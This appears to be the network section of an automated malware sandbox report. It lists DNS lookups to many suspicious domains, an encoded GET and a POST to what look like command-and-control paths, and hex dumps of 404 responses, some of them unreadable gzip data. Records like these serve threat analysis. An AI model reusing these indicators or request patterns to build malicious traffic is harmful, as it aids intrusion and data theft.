                Source: global trafficHTTP traffic detected: GET /ugkq/?NX1=2IPNaPUBIEKLMYesi4AZuw9Rok9D8k31Sq4y45D8jA04/h+slag64ifzswuCNybk3ABolq+6ms7eRJi+n4lhIXVNvQbvyHnA8wFZjZxFLnDVqZQunkENuSk=&dVC=cRpHHbL8w HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.usastakes.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.loonerverse.app
                Source: global trafficDNS traffic detected: DNS query: www.primepath.net
                Source: global trafficDNS traffic detected: DNS query: www.031233435.xyz
                Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                Source: global trafficDNS traffic detected: DNS query: www.publicblockchain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.multo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tkloqr.info
                Source: global trafficDNS traffic detected: DNS query: www.streaay.live
                Source: global trafficDNS traffic detected: DNS query: www.77zhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.thefounder.ceo
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global trafficDNS traffic detected: DNS query: www.spacewalker.app
                Source: global trafficDNS traffic detected: DNS query: www.ufin89.biz
                Source: global trafficDNS traffic detected: DNS query: www.usastakes.xyz
                Source: global trafficDNS traffic detected: DNS query: www.ppistealid.cyou
                Source: unknownHTTP traffic detected: POST /esw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.primepath.netOrigin: http://www.primepath.netReferer: http://www.primepath.net/esw3/User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36Data Raw: 4e 58 31 3d 66 52 67 6e 4e 56 4e 53 56 54 69 4d 64 58 4b 48 68 57 4e 41 70 46 70 46 34 4d 68 39 48 55 37 63 38 4c 4c 48 34 71 62 2b 58 50 43 62 49 51 33 6a 77 52 6c 77 4f 47 6f 77 71 75 50 36 79 53 4a 38 73 34 68 53 62 58 63 4a 4a 4b 65 51 67 36 73 48 43 6a 75 46 51 31 56 46 4a 48 59 79 4c 4e 56 61 47 56 56 64 67 4f 75 4c 68 53 45 63 4b 52 71 52 56 7a 50 54 33 55 57 31 35 30 61 35 67 52 65 39 4b 71 68 47 61 33 57 35 4c 71 56 77 30 37 2b 6d 65 32 70 39 48 45 30 32 6b 62 34 33 42 35 2f 32 7a 77 32 41 6e 4c 41 70 64 6c 32 68 43 4f 36 4c 65 79 65 55 5a 38 4f 52 72 74 75 4e 69 4f 53 62 72 51 3d 3d Data Ascii: NX1=fRgnNVNSVTiMdXKHhWNApFpF4Mh9HU7c8LLH4qb+XPCbIQ3jwRlwOGowquP6ySJ8s4hSbXcJJKeQg6sHCjuFQ1VFJHYyLNVaGVVdgOuLhSEcKRqRVzPT3UW150a5gRe9KqhGa3W5LqVw07+me2p9HE02kb43B5/2zw2AnLApdl2hCO6LeyeUZ8ORrtuNiOSbrQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 Mar 2025 07:31:40 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 265Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6f 6e 65 72 76 65 72 73 65 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.loonerverse.app Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 05 Mar 2025 07:31:56 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 05 Mar 2025 07:31:56 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 05 Mar 2025 07:31:59 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 07:32:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 07:32:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 07:32:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 07:32:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 07:33:22 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 